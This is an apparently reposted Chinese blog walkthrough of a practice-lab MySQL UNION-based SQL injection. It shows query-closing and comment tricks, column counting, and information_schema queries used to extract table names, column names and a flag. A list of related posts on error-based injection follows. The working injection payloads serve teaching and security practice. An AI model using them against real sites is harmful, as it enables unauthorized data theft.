2. 程式人生 > 資料庫 >MYSQL顯錯注入演示

MYSQL顯錯注入演示

阿新 發佈:2020-12-03

靶場題目:
在這裡插入圖片描述
注意閉合
用”)進行閉合 進行閉合後就不再是字串,輸入的資料可以被當成程式碼執行 id=() 閉合了前括號, 還有註釋掉後面的後括號,用-- qwe 主要是為了保留橫橫後面的空格,因為可以自動去除空格後的內容,就去掉了後括號
步驟

")order by 3 -- qwe
") union select 1,2,3 -- qwe
“) and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1— qwe

在這裡插入圖片描述

輸出點:

") union select 1,2,3 – qwe

1,2,3是欄位的佔位符,代表有三個欄位,回顯是2,3 說明有兩個輸出點。三個欄位能夠輸出資料的只有2個
eg:’)union select 4,5,6,7,8,9 – qwe 回顯是5,說明就只有一個輸出點
,下一條語句就可以寫成and 1=2 union select 1,table_name from infoamtion_schema.table…
數字只是佔位,但是必須寫

然後就可以寫“) and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1— qwe

在這裡插入圖片描述
這樣就找到了表名
接下來找欄位名
在這裡插入圖片描述
最後一步找想要的資料
在這裡插入圖片描述

嘿嘿 找到flag

union :

直接寫select 1,2,3 不符合語法規則
union select 1,2,3 中的union 是聯合查詢的意思,前面一條資料會優先返回,所以可以寫一個 and 1=2 讓前面的返回值為空,進而返回我們後面寫的語句
但是也可以不用寫 and 1=2 直接把id=1 改成一個不可能的數字 可以寫成這樣:eg :id=0.99999 之類的

相關推薦

MYSQL注入演示

靶場題目:注意閉合 用”)進行閉合 進行閉合後就不再是字串,輸入的資料可以被當成程式碼執行 id=() 閉合了前括號, 還有註釋掉後面的後括號,用-- qwe 主要是為了保留橫橫後面的空格,因為可以自動去除空

SQL注入注入-POST

post 形式進行傳參 測試點: 測試萬能密碼 \'or 1=1 -- qwe 0x00 首先了解post傳參與get傳參的區別:

Mysql注入

注入原理 floor() Rand() //隨機函式 Floor() //取整函式 Count() //聚合函式 Group by key //分組語句

MYSQL updatexml()函式報注入解析

首先了解下updatexml()函式 UPDATEXML (XML_document,XPath_string,new_value); 第一個引數:XML_document是String格式,為XML文件物件的名稱,文中為Doc

MYSQL 其他函式報注入

都為空間資料儲存函式,其餘函式的報原理與GeometryCollection()原理相同 MYSQL 中的空間資料儲存

MYSQL 通過GeometryCollection()報注入

技術標籤:mysql 函式解釋 GeometryCollection是由1個或多個任意類幾何物件構成的幾何物件。GeometryCollection中的所有元素必須具有相同的空間參考系(即相同的座標系)。對GeometryCollection的元素無任何限制

MYSQL 通過NAME_CONST()報注入

技術標籤:mysql 函式解釋 NAME_CONST(name,value) Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be c

MYSQL 通過UpdateXml()報注入

技術標籤:mysql 函式解釋: UPDATEXML (XML_document, XPath_string, new_value); 第一個引數:XML_document是String格式,為XML文件物件的名稱 第二個引數:XPath_string (Xpath格式的字串) ,如果不瞭解Xpath

MYSQL 通過ExtractValue()報注入

技術標籤:mysql 函式解釋: extractvalue():從目標XML中返回包含所查詢值的字串。   EXTRACTVALUE (XML_document, XPath_string);   第一個引數:XML_document是String格式,為XML文件物件的名稱   第二

盲注&報注入-mysql

看到身邊同學寫個 sql 注入指令碼不費吹灰之力,我酸了,你要問我是什麼酸,寫不出來的心酸。

sql 基礎注入

所用方法 sqlmap跑,get請求 通過之前的經驗,知道了資料庫是error,表是error_flag

Mysql的十種報注入

SQL報注入 目錄Mysql的十種報注入1.floor()2.extractvalue()3.updatexml()4.geometrycollection()5.multipoint()6.polygon()7.multipolygon()8.linestring()9.multilinestring()10.exp()

學習筆記十三:MySQL手注之報注入

原理詳解 當在一個聚合函式,比如count函式後面如果使用分組語句就會把查詢的一部分一部分以錯誤的形式顯示出來。

如何理解MySQL注入中extractvalue()報注入中的0x7e

在學習報注入的過程中,對於extractvalue()這個函式的報注入始終抱有一個疑問,為什麼再concat連線語句時始終要有個0x7e在前面呢?

Linux連線mysql:Access denied for user ‘root’@‘localhost’(using password: YES)的解決方法

前言 最近在linux連線mysql /usr/local/mysql/bin/mysql -uroot -p 輸入密碼出現Access denied for user \'root\'@\'localhost\'(using password: YES)錯誤。下面話不多說了,來一起看看詳細的解決方法吧

淺析MySQL式型別轉換

CAST 函式 在之前的文章中,我們提到過CAST函式,用於顯示進行型別轉換。在避免隱式型別轉換時,好處多多。其實這裡面還有很多細節,是需要梳理下的。

MySQL中報:Can’t find file: ‘./mysql/plugin.frm’的解決方法

發現問題 最近在工作中發現了一個問題,這個問題就是MySQL的磁碟滿了,將資料庫目錄data移動到/data3目錄,/etc/my.cnf裡面也修改了相應的datadir目錄,許可權也賦予了,但是service mysql start;的時候報,下面話

解決springboot 連線 mysql 時報 using password: NO的方案

最近使用 springboot 配置 mysql 時出現了一個錯誤 Access denied for user \'\'@\'localhost\' (using password: YES) 或者

解決IDEA連線mysql:Server returns invalid timezone. Go to 'Advanced' tab and set 'server

原因: MySQL驅動jar中的預設時區是UTC。 UTC代表的是全球標準時間 ,但是我們使用的時間是北京時區也就是東八區,領先UTC八個小時。

mysql 1366 Incorrect string value 原因與解決方法

問題:用python向資料庫中插入記錄時,遇到mysql 1366 Incorrect string value 解決方法:編碼問題,python中我使用的編碼為utf8,和資料庫中的編碼不一致導致的。因此需要檢視資料庫中的編碼:資料表的編碼、欄